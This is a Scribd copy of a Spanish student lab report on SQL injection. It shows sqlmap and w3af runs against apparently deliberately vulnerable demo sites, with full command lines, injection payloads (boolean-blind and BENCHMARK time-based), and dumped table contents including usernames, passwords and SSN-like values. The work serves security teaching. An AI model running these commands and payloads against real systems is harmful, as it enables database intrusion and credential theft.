100% found this document useful (1 vote)

3K views19 pages

SQL Injection Analysis with SQLmap

Sqlmap was used to analyze the security of the website http://zero.webappsecurity.com. It identified a SQL injection vulnerability in the "get" GET parameter. Sqlmap determined the backend database was Microsoft Access and able to retrieve the name of one table ("password") containing user credentials and columns like "name", "pass", "user", etc.

Uploaded by

Ivan Martin Valderas

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

100% found this document useful (1 vote)

3K views19 pages

SQL Injection Analysis with SQLmap

Uploaded by

Ivan Martin Valderas

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

SEGURIDAD

Ivn Martn Valderas

SQL INJECTION (III)]

[

Contenido
1. A) [Link] ............................................................................ 2 SQLmap ....................................................................................................................... 2

b) W3af ................................................................................................................................... 8 2. A) [Link] 10 SQLmap ........................................................................................................................... 10

b) W3af ................................................................................................................................. 13 3. Otros: ............................................................................................................................ 14

[Link] 14 A) B) A) SQLmap ........................................................................................................................... 14 W3af ................................................................................................................................ 15 SQLmap ........................................................................................................................... 16

B) W3af .............................................................................................................................. 17

1. [Link] A) SQLmap
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] [Link]" --level=3 --risk=3 --flush-session --technique=B --batch
[*] starting at: [Link] [Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file [Link] [INFO] flushing session file [Link] [INFO] testing connection to the target url [Link] [INFO] heuristics detected web page charset 'ascii' [Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y [Link] [INFO] testing if the url is stable, wait a few seconds [Link] [INFO] url is stable [Link] [INFO] testing if GET parameter 'get' is dynamic [Link] [WARNING] GET parameter 'get' appears to be not dynamic [Link] [WARNING] heuristic test shows that GET parameter 'get' might not be injectable [Link] [INFO] testing sql injection on GET parameter 'get' [Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [Link] [INFO] GET parameter 'get' is 'OR boolean-based blind - WHERE or HAVI NG clause' injectable [Link] [INFO] checking if the injection point on GET parameter 'get' is a fa lse positive [Link] [INFO] GET parameter 'get' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 88 HTTP(s) requ ests: --Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --[Link] [INFO] manual usage of GET payloads requires url encoding

[Link] [INFO] testing Microsoft Access [Link] [INFO] confirming Microsoft Access [Link] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: [Link], Microsoft IIS 6.0 back-end DBMS: Microsoft Access
[Link] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 24 times [Link] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s qlmap/trunk/sqlmap/output/[Link]'

root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] /[Link]?get=email@[Link]" --batch --tables --threads=8

[*] starting at: [Link] [Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file [Link] [INFO] resuming injection data from session file [Link] [INFO] resuming back-end DBMS 'microsoft access' from session file [Link] [INFO] testing connection to the target url [Link] [INFO] heuristics detected web page charset 'ascii' [Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --[Link] [INFO] manual usage of GET payloads requires url encoding [Link] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: [Link], Microsoft IIS 6.0 back-end DBMS: Microsoft Access [Link] [INFO] fetching tables for database: `Microsoft_Access_masterdb` [Link] [INFO] fetching number of tables for database '`Microsoft_Access_mast erdb`' [Link] [INFO] retrieved: [Link] [WARNING] unable to retrieve the number of tables for database '`Micr osoft_Access_masterdb`' [Link] [ERROR] cannot retrieve table names, back-end DBMS is Access [Link] [INFO] do you want to use common table existence check? [Y/n/q] Y [Link] [INFO] checking table existence using items from '/home/stamparm/Work /sqlmap/trunk/sqlmap/txt/[Link]' [Link] [INFO] adding words used on web page to the check list [Link] [INFO] starting 8 threads [Link] [INFO] retrieved: password

Database: Microsoft_Access_masterdb [1 table] +----------+ | password | +----------+

[Link] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 3091 times [Link] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s qlmap/trunk/sqlmap/output/[Link]' [*] shutting down at: [Link]

root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] /[Link]?get=email@[Link]" --batch --columns -T password --threads=8

[Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file [Link] [INFO] resuming injection data from session file [Link] [INFO] resuming back-end DBMS 'microsoft access' from session file [Link] [INFO] resuming brute forced table name 'password' from session file [Link] [INFO] testing connection to the target url [Link] [INFO] heuristics detected web page charset 'ascii' [Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --[Link] [INFO] manual usage of GET payloads requires url encoding [Link] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: [Link], Microsoft IIS 6.0 back-end DBMS: Microsoft Access [Link] [ERROR] cannot retrieve column names, back-end DBMS is Access [Link] [INFO] do you want to use common columns existence check? [Y/n/q] Y [Link] [INFO] checking column existence using items from '/home/stamparm/Wor k/sqlmap/trunk/sqlmap/txt/[Link]' [Link] [INFO] starting 8 threads [Link] [INFO] retrieved: name [Link] [INFO] retrieved: country [Link] [INFO] retrieved: surname [Link] [INFO] retrieved: pass [Link] [INFO] retrieved: user [Link] [INFO] retrieved: admin [Link] [INFO] retrieved: active

root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] /[Link]?get=email@[Link]" --batch --dump -T password -C admin,pass,sur name,user --threads=8 --fresh-queries
[Link] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/[Link] [Link]/session' as session file [Link] [INFO] resuming injection data from session file [Link] [INFO] resuming back-end DBMS 'microsoft access' from session file [Link] [INFO] resuming brute forced table name 'password' from session file [Link] [INFO] resuming brute forced column name 'name' for table 'password' from session file [Link] [INFO] resuming brute forced column name 'country' for table 'passwor d' from session file [Link] [INFO] resuming brute forced column name 'surname' for table 'passwor d' from session file [Link] [INFO] resuming brute forced column name 'pass' for table 'password' from session file [Link] [INFO] resuming brute forced column name 'user' for table 'password' from session file [Link] [INFO] resuming brute forced column name 'admin' for table 'password' from session file [Link] [INFO] resuming brute forced column name 'active' for table 'password ' from session file [Link] [INFO] resuming brute forced column name 'name' for table 'password' from session file [Link] [INFO] testing connection to the target url [Link] [INFO] heuristics detected web page charset 'ascii' [Link] [INFO] sqlmap got a 302 redirect to '[Link] 0/[Link]'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --[Link] [INFO] manual usage of GET payloads requires url encoding [Link] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: [Link], Microsoft IIS 6.0 back-end DBMS: Microsoft Access [Link] [ERROR] cannot retrieve column names, back-end DBMS is Access [Link] [INFO] fetching column(s) 'admin, surname, user, pass' entries for ta ble 'password' on database 'Microsoft_Access_masterdb' [Link] [INFO] fetching number of columns 'admin, surname, user, pass' entrie s for table 'password' on database 'Microsoft_Access_masterdb' [Link] [INFO] retrieved: 73 [Link] [INFO] fetching number of distinct values for column 'user' [Link] [INFO] retrieved: 7 [Link] [INFO] fetching number of distinct values for column 'pass' [Link] [INFO] retrieved: 6 [Link] [INFO] fetching number of distinct values for column 'admin' [Link] [INFO] retrieved: 2 [Link] [INFO] fetching number of distinct values for column 'surname' [Link] [INFO] retrieved: 5 [Link] [WARNING] no proper pivot column provided (with unique values). all r ows can't be retrieved. [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 11 [Link] [INFO] retrieved: 576-11-1121 [Link] [INFO] retrieving the length of query output

[Link] [INFO] retrieved: 4 [Link] [INFO] retrieved: pass [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 2 [Link] [INFO] retrieved: no [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 5 [Link] [INFO] retrieved: Shawn [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 11 [Link] [INFO] retrieved: 576-14-1122 [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 5 [Link] [INFO] retrieved: divad [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 2 [Link] [INFO] retrieved: no [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: [Link] [INFO] retrieved: [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 11 [Link] [INFO] retrieved: 592-11-8393 [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 4 [Link] [INFO] retrieved: pass [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 2 [Link] [INFO] retrieved: no [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: [Link] [INFO] retrieved: [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 11 [Link] [INFO] retrieved: 991-99-8765 [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 14 [Link] [INFO] retrieved: canwehavemoney [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 2 [Link] [INFO] retrieved: no [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: [Link] [INFO] retrieved: [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 5 [Link] [INFO] retrieved: admin [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 5 [Link] [INFO] retrieved: admin [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 3 [Link] [INFO] retrieved: yes [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 5 [Link] [INFO] retrieved: Admin [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 13 [Link] [INFO] retrieved: bleh@[Link] [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 10 [Link] [INFO] retrieved: bleh88bleh [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 2 [Link] [INFO] retrieved: no [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 8 [Link] [INFO] retrieved: blehbleh [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 4 [Link] [INFO] retrieved: user

[Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 4 [Link] [INFO] retrieved: user [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 2 [Link] [INFO] retrieved: no [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: 4 [Link] [INFO] retrieved: User [Link] [INFO] retrieving the length of query output [Link] [INFO] retrieved: [Link] [INFO] retrieved:

[Link]

b) W3af
Primero configuramos el programa, en modo consola desde BackTrack5: w3af>>> plugins w3af/plugins>>> audit sqli w3af/plugins>>> output console,textFile w3af/plugins>>> output config textFile w3af/plugins/output/config:textFile>>> set fileName [Link] w3af/plugins/output/config:textFile>>> back w3af/plugins>>> back

Ejecutamos un escaneo:

w3af>>> target w3af/config:target>>> set target [Link] w3af/config:target>>> back w3af>>> start
Auto-enabling plugin: grep.error500 Found 3 URLs and 5 different points of injection. The list of URLs is:

- [Link] - [Link] - [Link]

- [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="") A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "'80040e14'". The error was found on response with id 23. A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "Microsoft OLE DB Provider for ODBC Drivers". The error was found on response with id 23. A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "[Microsoft][ODBC Microsoft Access Driver]". The error was found on response with id 23. SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23. Scan finished in 20 seconds. w3af>>>
[Link]

2. [Link]
A) SQLmap
root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] [Link]" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurity No=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&d rpState=&txtTelephoneNo=&txtEmail=[Link]%[Link]&txtAnnualIncome=10212&d rpLoanType=Home&sendbutton1=Submit" --batch --banner --flush-session -p txtAnnua lIncome --level=3 --risk=3
[Link] [INFO] using 'pentest/database/sqlmap/output/[Link]/session' a s session file [Link] [INFO] flushing session file [Link] [INFO] testing connection to the target url [Link] [INFO] testing if the url is stable, wait a few seconds [Link] [INFO] url is stable [Link] [INFO] heuristic test shows that POST parameter 'txtAnnualIncome' mig ht be injectable (possible DBMS: MySQL) [Link] [INFO] testing sql injection on POST parameter 'txtAnnualIncome' [Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene ric comment)' [Link] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig inal value)' [Link] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses' [Link] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ L comment)' [Link] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (R LIKE)' [Link] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET - original value)' [Link] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [Link] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' [Link] [INFO] testing 'MySQL stacked conditional-error blind queries' [Link] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [Link] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause ' [Link] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' [Link] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause' [Link] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [Link] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [Link] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau ses' [Link] [INFO] testing 'MySQL > 5.0.11 stacked queries' [Link] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [Link] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [Link] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)' [Link] [INFO] POST parameter 'txtAnnualIncome' is 'MySQL < 5.0.12 AND time-b ased blind (heavy query)' injectable [Link] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [Link] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns' [Link] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [Link] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns' [Link] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns' [Link] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[Link] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns ' [Link] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [Link] [INFO] testing 'Generic UNION query (random number) - 11 to 20 column s' [Link] [INFO] target url appears to be UNION injectable with 12 columns [Link] [WARNING] if UNION based SQL injection is not detected, please consid er providing --union-char switch (e.g. --union-char=1) and/or try to force the b ack-end DBMS (e.g. --dbms=mysql) [Link] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns' [Link] [INFO] checking if the injection point on POST parameter 'txtAnnualIn come' is a false positive POST parameter 'txtAnnualIncome' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 619 HTTP(s) req uests: --Place: POST Parameter: txtAnnualIncome Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222& txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTel ephoneNo=&txtEmail=[Link]@[Link]&txtAnnualIncome=10212 AND 7764=BENCHMARK (5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit --[Link] [INFO] testing MySQL [Link] [INFO] confirming MySQL [Link] [WARNING] adjusting time delay to 3 seconds (due to good response tim es) [Link] [INFO] the back-end DBMS is MySQL [Link] [INFO] fetching banner [Link] [INFO] retrieved: 4.0.18-nt

web server operating system: Windows web application technology: Apache 2.0.49, PHP 4.3.7 back-end DBMS operating system: Windows back-end DBMS: MySQL < 5.0.0 banner: '4.0.18-nt'

root@bt:/pentest/database/sqlmap# python [Link] -u "[Link] [Link]" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurity No=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&d rpState=&txtTelephoneNo=&txtEmail=[Link]%[Link]&txtAnnualIncome=10212&d rpLoanType=Home&sendbutton1=Submit" --batch --current-db
[Link] [INFO] using 'pentest/database/sqlmap/output/[Link]/session' a s session file [Link] [INFO] resuming injection data from session file [Link] [INFO] resuming back-end DBMS 'mysql 4' from session file [Link] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: POST Parameter: txtAnnualIncome Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222& txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTel ephoneNo=&txtEmail=[Link]@[Link]&txtAnnualIncome=10212 AND 7764=BENCHMARK (5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit --[Link] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.0.49, PHP 4.3.7 back-end DBMS: MySQL 4 [Link] [INFO] fetching current database [Link] [WARNING] time-based comparison needs larger statistical model. Makin g a few dummy requests, please wait..

[Link] [WARNING] adjusting time delay to 1 second (due to good response times) bank current database: 'bank'
[Link] [INFO] Fetched data logged to text files under '/Pentest/database/sqlmap/ou Tput/[Link]' [*] shutting down at [Link]

[Link]

b) W3af
w3af>>> target w3af/config:target>>> set target [Link] w3af/config:target>>> back w3af>>> start
Found 3 URLs and 5 different points of injection. The list of URLs is:

- [Link] - [Link] - [Link]

The list of fuzzable requests is: - [Link] | Method: GET - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum") - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard") - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="standard") - [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="") SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23. Scan finished in 13 seconds. w3af>>>

3. Otros: [Link] A) SQLmap root@bt:/pentest/database/sqlmap# ./[Link] -u "[Link] -b

[Link] [INFO] using '/pentest/database/sqlmap/output/[Link]/session' as session file [Link] [INFO] testing connection to the target url [Link] [INFO] heuristics detected web page charset 'ascii' [Link] [INFO] testing if the url is stable, wait a few seconds [Link] [INFO] url is stable [Link] [INFO] testing if GET parameter 'id' is dynamic [Link] [INFO] confirming that GET parameter 'id' is dynamic [Link] [INFO] GET parameter 'id' is dynamic [Link] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable [Link] [INFO] testing sql injection on GET parameter 'id' [Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [Link] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y [Link] [INFO] testing 'MySQL > 5.0.11 stacked queries' [Link] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [Link] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [Link] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[Link] [WARNING] GET parameter 'id' is not injectable

[Link] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details [Link] [WARNING] HTTP error codes detected during testing: 404 (Not Found) - 88 times

A pesar de que la pgina estuviera en la lista, no posee vulnerabilidad con SQLmap, a mano tampoco se ha detectado ninguna, posiblemente se halla solucionado.

B) W3af
w3af>>> target w3af/config:target>>> set target [Link] w3af/config:target>>> back w3af>>> start
Found 4 URLs and 6 different points of injection. The list of URLs is: - [Link] - [Link] - [Link] - [Link] The list of fuzzable requests is: - [Link] | Method: GET - [Link] | Method: GET - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum") - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard") - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="standard") - [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="") SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23. Scan finished in 12 seconds. w3af>>>

Como podemos ver, al no borrar los anteriores escaneos, se mantienen asique ponemos en negrita el actual

[Link] A) SQLmap root@bt:/pentest/database/sqlmap# ./[Link] -u "[Link] -b

[Link] [INFO] using '/pentest/database/sqlmap/output/[Link]/session' as session file [Link] [INFO] testing connection to the target url [Link] [INFO] testing if the url is stable, wait a few seconds [Link] [INFO] url is stable [Link] [INFO] testing if GET parameter 'id' is dynamic [Link] [WARNING] GET parameter 'id' appears to be not dynamic [Link] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable [Link] [INFO] testing sql injection on GET parameter 'id' [Link] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [Link] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [Link] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [Link] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [Link] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [Link] [INFO] testing 'MySQL > 5.0.11 stacked queries' [Link] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [Link] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [Link] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [Link] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [Link] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [Link] [INFO] testing 'Oracle AND time-based blind' [Link] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [Link] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [Link] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

[Link] [WARNING] GET parameter 'id' is not injectable

Encontramos otra no injectable

B) W3af
w3af>>> target w3af/config:target>>> set target [Link] w3af/config:target>>> back w3af>>> start Found 5 URLs and 7 different points of injection. The list of URLs is: - [Link] - [Link] - [Link] - [Link] - [Link] The list of fuzzable requests is: - [Link] | Method: GET - [Link] | Method: GET - [Link] | Method: GET - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum") - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard") - [Link] | Method: POST | Parameters: (login="", password="", graphicOption="standard") - [Link] | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="") SQL injection in a Microsoft SQL database was found at: "[Link] using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23. Scan finished in 11 seconds. w3af>>>

Como hemos podido comprobar en los 2 ltimos escaneos, estamos ante un conflicto de programas, SQLmap por una parte no encuentra ninguna vulnerabilidad mientras que w3af s. Ah es donde entra el recurso humano, aunque hemos probado a mano 6 no hemos encontrado ninguna vulnerabilidad.

IP Address Download List
No ratings yet
IP Address Download List
1,221 pages
User Credentials and IP Addresses List
No ratings yet
User Credentials and IP Addresses List
5 pages
PLCMSpIp Access Logs Summary
No ratings yet
PLCMSpIp Access Logs Summary
8 pages
IP Address List for HTTP Ports
No ratings yet
IP Address List for HTTP Ports
138 pages
Common SSH Credentials List
No ratings yet
Common SSH Credentials List
1 page
Cresol and Fag Blackboard Access Guide
No ratings yet
Cresol and Fag Blackboard Access Guide
4,566 pages
IP Address List for Proxy Servers
No ratings yet
IP Address List for Proxy Servers
5 pages
IP Address and Credential List
No ratings yet
IP Address and Credential List
4 pages
cPanel Login Links for Mochahost
No ratings yet
cPanel Login Links for Mochahost
1 page
VSCode Exploited as Remote Access Tool
No ratings yet
VSCode Exploited as Remote Access Tool
21 pages
Exploiting OpenSSH 7.6p1 in Playground
No ratings yet
Exploiting OpenSSH 7.6p1 in Playground
5 pages
Session Fixation Vulnerability
100% (5)
Session Fixation Vulnerability
16 pages
Lexmark MC3224adwe RCE Exploit Script
No ratings yet
Lexmark MC3224adwe RCE Exploit Script
5 pages
RDP Access Credentials List
No ratings yet
RDP Access Credentials List
2 pages
PHP Shell Uploading Techniques Guide
No ratings yet
PHP Shell Uploading Techniques Guide
10 pages
Passwords and Credentials Overview
No ratings yet
Passwords and Credentials Overview
2 pages
Microsoft Outlook Login Automation Script
No ratings yet
Microsoft Outlook Login Automation Script
9 pages
Remote Desktop Access Credentials List
No ratings yet
Remote Desktop Access Credentials List
4 pages
SQL Injection to Shell Exploitation Guide
No ratings yet
SQL Injection to Shell Exploitation Guide
37 pages
Secure Server Login Credentials
No ratings yet
Secure Server Login Credentials
2 pages
PowerShell Exploitation Techniques
No ratings yet
PowerShell Exploitation Techniques
8 pages
List of .env File URLs
No ratings yet
List of .env File URLs
12 pages
Nmap Enumeration of 192.168.250.96
No ratings yet
Nmap Enumeration of 192.168.250.96
6 pages
BreachDirectory API Overview
No ratings yet
BreachDirectory API Overview
49 pages
Hack The Box Cheat Sheet Overview
No ratings yet
Hack The Box Cheat Sheet Overview
1 page
O2switch cPanel Access Links
No ratings yet
O2switch cPanel Access Links
1 page
Client Area Access for Hosting Services
No ratings yet
Client Area Access for Hosting Services
9 pages
Rusty Key HTB Walkthrough Guide
No ratings yet
Rusty Key HTB Walkthrough Guide
1 page
cPanel Login Details and Access Links
No ratings yet
cPanel Login Details and Access Links
2 pages
Exploiting HTTP Host Header Attacks
No ratings yet
Exploiting HTTP Host Header Attacks
5 pages
Compromised Credentials List
No ratings yet
Compromised Credentials List
100 pages
Common Default Passwords List
No ratings yet
Common Default Passwords List
8 pages
Free VPS List and Credentials
100% (1)
Free VPS List and Credentials
6 pages
PHP File Upload Exploits Overview
No ratings yet
PHP File Upload Exploits Overview
3 pages
Web Security Vulnerabilities Guide
No ratings yet
Web Security Vulnerabilities Guide
4 pages
Database and Email Configuration Guide
No ratings yet
Database and Email Configuration Guide
5 pages
Web Links and Resources Overview
No ratings yet
Web Links and Resources Overview
168 pages
Join Our Exclusive Hacking Telegram Channel
No ratings yet
Join Our Exclusive Hacking Telegram Channel
46 pages
OWASP Thick Client Pentesting Checklist
No ratings yet
OWASP Thick Client Pentesting Checklist
8 pages
Common Password Hashes List
No ratings yet
Common Password Hashes List
1 page
SMB Enumeration and Hardening Guide
0% (1)
SMB Enumeration and Hardening Guide
17 pages
Metasploit Pro License Registration Guide
No ratings yet
Metasploit Pro License Registration Guide
1 page
AD Pentest
No ratings yet
AD Pentest
26 pages
Outlook IMAP, POP3, SMTP Settings Guide
No ratings yet
Outlook IMAP, POP3, SMTP Settings Guide
4 pages
PowerShell Security and Configuration Script
No ratings yet
PowerShell Security and Configuration Script
1 page
SQL Injection Exploitation Guide
No ratings yet
SQL Injection Exploitation Guide
8 pages
THC-Hydra Cheat Sheet 2025 Edition
No ratings yet
THC-Hydra Cheat Sheet 2025 Edition
4 pages
c99 PHP
No ratings yet
c99 PHP
62 pages
Common Passwords List for 2025
No ratings yet
Common Passwords List for 2025
440 pages
API Vulnerabilities and Testing Techniques
No ratings yet
API Vulnerabilities and Testing Techniques
66 pages
MS Access SQL Injection Techniques
No ratings yet
MS Access SQL Injection Techniques
3 pages
Understanding SQL Injection Attacks
100% (1)
Understanding SQL Injection Attacks
10 pages
SQL Injection Attacks and Countermeasures
No ratings yet
SQL Injection Attacks and Countermeasures
41 pages
SQL Injection Prevention on Bank Websites
No ratings yet
SQL Injection Prevention on Bank Websites
17 pages
